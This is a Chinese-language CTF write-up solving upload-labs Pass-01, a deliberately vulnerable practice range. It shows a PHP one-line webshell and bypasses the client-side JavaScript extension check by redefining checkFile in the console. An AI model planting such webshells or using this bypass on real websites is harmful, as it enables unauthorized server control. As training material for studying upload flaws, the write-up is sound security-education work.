【CTF Web】BUUCTF Upload-Labs-Linux Pass-01 Writeup（JS分析+代码审计+文件上传）

Upload-Labs-Linux

1
点击部署靶机。

简介

upload-labs是一个使用php语言编写的，专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关，每一关都包含着不同上传方式。

注意

1.每一关没有固定的通关方法，大家不要自限思维！

2.本项目提供的writeup只是起一个参考作用，希望大家可以分享出自己的通关思路。

3.实在没有思路时，可以点击查看提示。

4.如果黑盒情况下，实在做不出，可以点击查看源码。

后续

如在渗透测试实战中遇到新的上传漏洞类型，会更新到upload-labs中。当然如果你也希望参加到这个工作当中，欢迎pull requests给我!

项目地址：https://github.com/c0ny1/upload-labs

任务

上传一个webshell到服务器。

提示

本pass在客户端使用js对不合法图片进行检查！

代码

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传，请上传" + allow_ext + "类型的文件,当前文件类型为：" + ext_name;
        alert(errMsg);
        return false;
    }
}

---

解法

传个一句话木马，

<?php @eval($_POST['a']); ?>

被拦截了。

查看网页源代码。

<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
                <p>请选择要上传的图片：</p><p>
                <input class="input_file" type="file" name="upload_file" data-sider-select-id="8b939efe-a60e-45ea-88b1-cf893d456c81">
                <input class="button" type="submit" name="submit" value="上传">
            </p></form>

通过 checkFile 函数检查文件类型。

    function checkFile() {
        var file = document.getElementsByName('upload_file')[0].value;
        if (file == null || file == "") {
            alert("请选择要上传的文件!");
            return false;
        }
        //定义允许上传的文件类型
        var allow_ext = ".jpg|.png|.gif";
        //提取上传文件的类型
        var ext_name = file.substring(file.lastIndexOf("."));
        //判断上传文件类型是否允许上传
        if (allow_ext.indexOf(ext_name) == -1) {
            var errMsg = "该文件不允许上传，请上传" + allow_ext + "类型的文件,当前文件类型为：" + ext_name;
            alert(errMsg);
            return false;
        }
    }

在控制台重新定义该函数。

function checkFile(){return true};

上传一句话木马，上传成功。

右键点击图片，复制图像链接。

http://b4ec024c-ea12-4003-a944-4d3d47076d7d.node5.buuoj.cn:81/upload/a.php

通过蚁剑连接。

访问根目录。

找到 flag。

Flag

flag{e5c6ec40-25ad-4ef3-bd64-22ae1e9cd061}

---

声明

本博客上发布的所有关于网络攻防技术的文章，仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行，并且严格遵守了相关法律法规。

博主坚决反对任何形式的非法黑客行为，包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时，必须遵守法律法规，不得用于任何非法目的。对于因使用这些技术而导致的任何后果，博主不承担任何责任。